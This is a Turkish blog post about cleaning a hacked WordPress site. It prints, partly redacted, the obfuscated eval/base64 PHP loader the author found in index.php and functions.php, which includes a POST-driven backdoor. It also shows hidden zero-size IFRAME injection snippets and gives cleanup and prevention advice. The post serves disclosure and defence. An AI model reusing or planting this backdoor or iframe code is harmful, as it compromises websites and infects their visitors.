Virüsler sürekli değişiyor ve gelişiyor. Yakın zaman içinde IFRAME Virüsü yaygınken şimdi de bu çıktı. Bir blogum Google tarafından zararlı site olarak gösteriliyordu. O an aklıma yazdığım şu yazıdaki kurallar geldi. Bu kurallar virüs bulaşmasına karşı alabileceğimiz önlemlerdi.

Sitemin kodlarını incelidiğim zaman index.php ve functions.php dosyalarında <-?php get_header(); ?-> tagından önce şifrelenmiş bir php kodu buldum. Bu kodları temizledim ve Google Web Araçları’ndan yeniden tarama istedim. Şimdilik sonucu bekliyorum. Büyük ihtimal düzelecek.

Bulduğum kod ise şöyleydi:

<?php eval(base64_decode(‘aWYoI**********************************

****diwnIycpLicuKj88L2lmcmFtZT4jaXMnL

CcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQS

E5qY21sd2RDQnpjbU05YUhS

MGNEb3ZMMjlzWVdZdWMyVXZjMmwwWlY5dmJHUXZaM

kZ0WlhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ

9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5Jykp

JHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5

KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKC

RzLCc8YScpKSRzPSRhLiRzO3JldH

VybiRz******************yYXkoKTtpZihmdW5jdGlvbl9l

eGlzdHMoJGMzbGhkMSkpY2FsbF91c

2VyX2Z1bmMoJGMz**************************duYW1lJ10p

PT0nYzNsaGQnKXJldHVybjtlbHNlaWYoJ

GE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF

5KCRhPT0nZGVmYXVsdCBvdXR

wd******************************1bMV09b2JfZ2V0X2NvbnRlb

nRzKCk7b2JfZW5kX2NsZWFuKCk7f

W9iX3N0YXJ0KCdjM2xoZCcpO2ZvcigkaT0wOyRpPGNvd

W50KCRzKTskaSsr********************xoZG

w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2MzbGhkM

icpKSE9J2MzbGhkMicpPyRhOjA7ZXZhbChi

YXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7′)); ?>

Not: Kodda yer alan ***’ları ben koydum. Bir sorun yaratmaması için.

Özellikle IFRAME virüsü nedeniyle siteniz Google ve Mozilla‘da saldırgan site olarak gözükmesine sebep olur. Bu durumu düzeltmek için yapmanız gerekenler şunlarıdır:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
2. Google hesabını yoksa yeni bir tane alın. Eğer varsa giriş yapınız.
3. Buraya sitenizi ekleyin ve doğrulamasını yapınız.
4. Sitenizin doğrulamasını yaptıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün. Sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüde yer alan “Siteyi tekrar değerlendirme” seçeneğine tıklayınız.
6. Burada siteniz de bulunan zararlı kodları temizlediğinizi ve yeniden değerlendirme istediğinizi belirtiniz.
7. Bir kaç gün içinde siteniz “Saldırgan Site” olmaktan kurtulacaktır.

Virüsler, gerek webmasterler için gerek internet kulanıcıları için büyük bir sorundur.  Bu virüs türlerinden birisi de IFRAME virüsüdür. Bu virüs son günlerde iyice yayılmaya başladı. Bu siteler Google ve Mozilla internet taracısı tarafından saldırgan site konumuna düşerler.

IFRAME Virüsü Nedir?

Virüslü bir bilgisayardan yapılan FTP bağlantısı sonuçu sitenin index,default gibi dosyalara ya da bütün dosyalara IFRAME olarak yerleşir. Virüsün amaçı bu şekilde siteye yerleşerek site kullanıcılarına virüs yaymaktır.

IFRAME Virüsü Nasıl Bulaşmaktadır?

Öncelikle virüs, güncel olmayan virüs prgoramı bulunmayan bilgisayara bulaşır. Daha sonra bu bilgisayardan yapılan FTP girişlerinin kayıtlı olduğu dosyayı çalarak ya da şifresini çalacaktır. Virüs bu bilgileri elde ettikten sonra sitenize giriş yapar. Giriş yapan virüs sitenizin index,default gibi dosyalarına ya da tamamına IFRAME kodunu yerleştirmektedir. Bu kodu genel olarak sayfanın sonuna koymaktadır. Bu kod HTML kodları arasına gizlenir.

Bu virüs ayrıca php,asp ve asp.net kodlarında bulunan açıklarnda sızarakta bulaşabilir. Dosyalarınızın yazılıma açık olması virüsün bulşamasını kolay hale getiri ve daha rahat bulaşmasını sağlar.

IFRAME Virüsü Kodları Nasıldır?

IFRAME virüsü örneği;

<IFRAME src=’http://siteadresi/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo “<IFRAME src=\”http://siteadresi\123″ width=1 height=1 style=\”visibility:hidden;position:absolute\”></IFRAME>”;

IFRAME Virüsünde Korunmak İçin Yapmamız Gerekenler Nelerdir?

Bu virüsden kendimizi ve sitemizi korumak yapmamız gerekn 4 şey var. Bunlar;

1 – Öncelikle FTP şifrenizi değiştiriniz.

2 – Bilgisayarınızda muhakkak güncel bir virüs programı kullanın(Kaspersky,Nod32 vb.).

3 – FTP şifrenizi otomatik hatırla konumunda tutmayınız ya da girişten sonra şifrenizi değiştiriniz.

4 – Virüsün sitedenizde bulunan php,asp ve asp.net kodlarında ki açıklardan bulaşma ihtimaline karşı dosyalarınızın yazılabilirliğini kapatınız. Sadece yazılıma açık olması gereken dosyaları açık bırakınız.

Sitenizdeki Dosyaları Kontrol Ediniz.

Öncelikle sitenizde bulunan index veya default dosyalarını kontrol ediniz. Virüs öncelikle bu dosyalara bulaşmaktadır. Ancak virüs diğer dosyalara da bulaşmaktadır. Bu nedenle diğer dosyalarıda gözden geçiriniz.